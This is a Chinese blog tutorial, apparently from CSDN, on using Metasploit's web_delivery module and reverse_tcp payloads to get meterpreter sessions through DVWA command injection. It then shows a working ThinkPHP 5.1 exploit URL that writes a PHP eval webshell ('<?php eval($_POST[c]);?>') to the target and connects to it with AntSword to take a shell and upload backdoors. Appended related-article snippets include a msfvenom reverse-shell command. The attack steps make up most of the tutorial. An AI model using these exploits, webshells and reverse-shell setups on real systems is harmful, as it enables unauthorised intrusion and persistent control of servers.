MSF-从webshell到完全控制

最新推荐文章于 2023-10-31 16:29:18 发布
最新推荐文章于 2023-10-31 16:29:18 发布
阅读量845 收藏 3
点赞数
文章标签: metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/scrawman/article/details/112772138
版权

文章目录

一、访问web站点,寻找漏洞

示例是在DVWA上的Command injection部分在low级别下进行的
在这里插入图片描述

当受害者主机存在比如命令注入、远程命令执行等问题时,攻击者可以利用web_delivery生成的一条命令建立连接。web_delivery支持php/python/powershell多种脚本。

进入msf,search web_delivery,选择

use exploit/multi/script/web_delivery

其默认脚本语言是python,如果要更换脚本语言可以show targets查看可以更换的语言的代号
在这里插入图片描述

set lhost = Your IP Address
set lport = Your Port
运行以后它会生成一条指令,只要目标机器运行这条指令我们就能建立session
在这里插入图片描述

在DVWA中直接输入这条命令,就能获取meterpreter

现在更换脚本语言为powershell,同时还要改变payload(在win7之后版本有效)

set target 2
set payload windows/meterpreter/reverse_tcp

如果提示端口被占用可以更换端口,或者jobs查看正在工作的端口,jobs -k ID 关闭该进程。
运行以后可以得到一条新的命令,能正确显示windows版本的语言

二、利用thinkphp 5.1漏洞

thinkphp是一个开源的php框架

我们输入URL
192.168.123.160/html/public/index.php?s=index/\think\template\driver\file/write&cacheFile=shell.php&
content=<?php%20eval($_POST[c]);?>
加粗部分就是一个webshell,最开头的是攻击目标的IP地址,接着的是你存放shell.php的文件路径,也就是说shell.php会和index.php在一个文件夹中

在目标主机植入webshell以后就要用到webshell管理工具,这里介绍蚁剑
右键添加数据,URL地址填写192.168.123.160/html/public/shell.php
连接密码就是POST[]里的内容:c
在这里插入图片描述

连接成功后双击就可以进入攻击目标的文件目录,右键还可以打开虚拟终端。至此就得到了一个目标主机的shell,还可以上传我们的后门文件。

题外话

以上介绍的两种方法需要两台主机能够连接,也就是它们要能互相ping通,这是reverse_tcp的基本要求。但是如果目标在公网,攻击者在内网,那么攻击者能ping通公网的目标,但是公网的目标ping不通攻击者,这个时候reverse_tcp就不能使用了,可以使用bind_tcp(绑定tcp)。但如果靶机连接不到攻击者,web_delievry就无法使用。

scrawman
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
php-msf-docs:PHP微服务框架开发手册,即Micro Service Framework For PHP Develop Manual
04-29
PHP-MSF开发手册 PHP微服务框架开发手册,即Micro Service Framework For PHP Develop Manual,PHP微服务框架即,是Camera360社区服务器端团队基于Swoole自主研发的现代化PHP服务框架,简称msf或者php-msf,它的核心设计思想是采用协程、异步、并行的创新技术手段提高系统的单机吞吐能力,降低整体服务器成本。 本手册从介绍异步、并行、协程等基础概念出发,再到框架如何使用,其中也介绍了部分内部实现的原理,简单易上手。通过学习本手册,再结合我们的demo示例项目,就能够使用构建大规模高性能的微服务化分布式系统。 _______ ____ ________ / /_ ____ ____ ___ _____/ __/ ___/ __ \/ _
MSF-FRONTEND
03-19
Create React App入门 该项目是通过引导的。 可用脚本 在项目目录中,可以运行: npm start 在开发模式下运行该应用程序。打开在浏览器中查看它。 如果您进行编辑,则页面将重新加载。您还将在控制台中看到任何棉绒错误。 npm test 在交互式监视模式下启动测试运行程序。有关更多信息,请参见关于的部分。 npm run build 构建生产到应用程序build文件夹。它在生产模式下正确捆绑了React,并优化了构建以获得最佳性能。 生成被最小化,并且文件名包括哈希值。您的应用已准备好进行部署! 有关更多信息,请参见关于的部分。 npm run eject 注意:这是单向操作。 eject ,您将无法返回! 如果您对构建工具和配置选择不满意,则可以随时eject 。此命令将从您的项目中删除单个生成依赖项。 相反,它将所有配置文件和传递依赖项(webpack,Babel,E
php-msf-demo
04-29
PHP-MSF DEMO PHP微服务框架即“”示例项目 How to Start # Step1. 下载项目 git clone https://github.com/pinguo/php-msf-demo.git # Step2. 安装docker镜像构建开发环境.进入项目目录 sh build.sh # Step3. 参考Step2输出的信息,使用ssh或者exec进入容器, 到达项目根目录, 安装依赖 composer install # Step4. 启动服务器, 可以使用supervisorctl执行update或者执行php server.php 即可。 php server.php Notice php-msf-demo示例项目使用的是最新的代码,即dev-master分支,生产环境请使用release的相关版本。 在有些环境中执行php server.php,由于inot
rtk_sensor_damagezfw_rtk_ROS_gpsrtkros_msf-ekf_
09-30
ros RTK驱动,可用于ROS开发,需要建立ROS工作空间
网络安全应急响应----9、WebShell应急响应
七天
03-23 8285
文章目录一、Webshell简介1、常见webshell2、Webshell检测二、Webshell应急响应流程1、判断是否被植入webshell2、临时处置3、Webshell排查4、系统排查4.1、Windows系统排查4.2、Linux系统排查4.3、Web日志分析4.4、网络流量排查4.5、清除加固三、Webshell防御方法 一、Webshell简介 Webshell通常指以JSP、ASP、 PHP等网页脚本文件形式存在的一种服务器可执行文件,一般带有文件操作、命令执行功能,是一种网页后门。攻
学习记录:通过MSF利用Web代码注入渗透服务器
qq_60709081的博客
06-07 325
靶机: Windows 10 专业版 22H2攻击机:Kali网站软件:PhpStudy靶场:DVWA就不演示搭建过程了(主要是懒)。本次测试的网页如下:难度等级:Low主要是学习怎么用代码注入和MSF的结合去控制主机(当然用WebShell去连接更简单)首先分析此页面使用的是命令拼接的方式来实现功能的,所以我在正常的Ping xxx 后面又加上了 “&” ,由此尝试可不可以执行别的命令,结果如上图。// 输入的语句点击Submit, 发现返回了Python的版本号!
webshell管理工具-冰蝎(Behinder)的安装和基础使用(msf联动,流量特征)
黄乔国PHP
03-22 8368
冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端,由于通信流量被加密,传统的WAF、IDS 设备难以检测,给威胁狩猎带来较大挑战。冰蝎其最大特点就是对交互流量进行对称加密,且加密密钥是由随机数函数动态生成,因此该客户端的流量几乎无法检测。在流量层,冰蝎的aes特征一直是厂商查杀的重点,在主机层,aes相关的API也是一个强特征。既然是特征,那就一定存在一个一成不变的常量,那我们就把这个特征泛化一下,让他成为变量。为了一劳永逸解决这个问题,
msf生成webshell_Metasploit 之使用socket通信的webshell简单分析
weixin_39693193的博客
12-22 322
Metasploit 之使用socket通信的webshell简单分析upload (Van Helsing) | 2013-01-08 21:530x01 前言常规的webshell都是调用该语言中常用函数来完成读取、执行等操作,从协议上来讲是采用http/https协议。但是和服务器通信还有另外一种方式:socket通信。常见的脚本语言asp,php,jsp,都可以实现对应的socket编程...
weevely混淆webshell联动msf
灰太的表格的博客
06-15 492
weevely混淆webshell的联合msf 生成 可以看到有两个参数,分别对应着进行混淆的两种方式。我们分别来试一下 整理一下代码稍后分析下混淆过程: 利用 将混淆后的webshell进行上传,并进行连接,会传回一个交互式的shell 常用命令: :audit_disablefunctionbypass Bypass disable_function restrictions with mod_cgi and .htaccess. :audit_etcpasswd
msf生成webshell_MSF之Web渗透
weixin_36212560的博客
01-13 801
WebShellroot@kali:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.80.163 LPORT=3333 -f raw -o a.php 生成a.phpmsf > use exploit/multi/handlermsf exploit(handler) > set payload php/meterpr...
metasploit自动化渗透攻击模块
11-18
metasploit自动化渗透攻击模块db_autopwn
ADGG-LSF-MSF-v1.0:ADGG-LSF-MSF-v1.0
02-18
建立React材料UI Redux 草稿JS ChartJS 棱镜JS React降价React完整日历快速开始安装依赖项: npm install或yarn 启动服务器: npm run start或yarn start 视图处于打开状态: localhost:3000 推荐最新的...LSF-MSF-v1.0
MSF:Web 后门
weixin_46104215的博客
11-21 1831
Web 后门泛指 WebShell,其实就是一段网页代码,包括 ASP、ASP.NET、PHP、JSP代码等。由于这些代码都运行在服务器,攻击者通过这段精心设计的代码,在服务器端进行一些危险的操作获得某些敏感的技术信息,或者通过渗透操作提权,从而获得服务器的控制权。(更具隐蔽性) Web 后门能提供非常多的功能,如执行命令、浏览文案、辅助提权、执行SQL语句、反弹Shell 等。 Windows 系统下比较出名的莫过于 “中国菜刀”,还有很多替代“中国菜刀”的跨平台开源工具...
MSF之攻击web站点漏洞获取目标机器最高权限
世间繁华梦一出
12-22 2385
利用MSF攻击web站点的漏洞获取最高权限方法一:通过web站点,使用无文件的方式攻击利用执行方法二:通过web站点,上传webshell(msfvenom后门木马),返回给msf方法三:攻击其他端口服务,拿到meterpreter 方法一:通过web站点,使用无文件的方式攻击利用执行 如何利用? 这里介绍一个msf的新模块web_delivery 当攻击者拥有部分受害者主机的控制权,但还没有拿到一个完整的shell时,web_delivery就派上用场了。 web_delivery的主要目的是快速和受害者
msf生成webshell_msf 之 webshell 提权
weixin_39623411的博客
12-22 347
首先建议一下到网上查查meterpreter的用法在看这篇文章,理解为什么要使用msf来提权(因为msf里边有个meterpreter很强大 ^_^)Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产...
msf生成webshell_生成常用的msf
weixin_39759441的博客
12-22 683
msf作为一款强大的漏洞检测工具,如何生成适用于msf的payload以及如何利用是使用msf的关键,今天就主要记录一下常用的payload以及如何使用。生成payload使用的工具是MSFVenom,下面看看他的帮助信息。在kali下可以使用如下命令列出MSFVenom可以生成的payload列表:msfvenom -l生成二进制文件关于二进制文件,主要介绍适用于Windows、linux、ma...
小白必学:msf基本使用
最新发布
fly_enum的博客
10-31 602
网络安全很多技术干货,都可以共享给你们,如果你肯花时间沉下心去学习,它们一定能帮到你网络安全工程师学习资料包循序渐进地对黑客攻防剖析。适合不同层次的粉丝。我希望能为大家提供切实的帮助,讲解通俗易懂,风趣幽默,风格清新活泼,学起来轻松自如,酣畅淋漓!如果你想要入坑黑客&网络安全工程师,这份282G全网最全的网络安全资料包!网络安全大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享👉网安(嘿客红蓝对抗)所有方向的学习路线👈对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。
msf生成webshell_CVE-2017-11882漏洞复现结合MSF拿电脑shell
weixin_32139875的博客
01-16 441
两个代码分别贴上[Python] 纯文本查看 复制代码import argparseimport sysRTF_HEADER = R"""{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}{\*\generator Riched20 6.3.9600}\viewkin...
kali攻防第13章 Metasploit之生成webshell及应用
安全参透之旅
12-24 6334
Metasploit之生成webshell及应用   准备工具 1、kali 系统 IP 10.10.10.131 2、受害者机子 IP 10.10.10.130 3、使用工具 Metasploit   步骤:   1、在msf生成asp脚本木马 root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.
msf命令 -p 和-f什么意思
05-16
msf 命令是 Metasploit Framework 的命令行工具。其中,-p 选项是指定要使用的 payload,payload 是指用来执行攻击的代码。而 -f 选项是指定输出文件的格式。例如,你可以使用 -f exe 选项将生成的攻击文件保存为可执行文件格式。具体使用方式可以在 msf 命令行中输入 help 命令查看帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值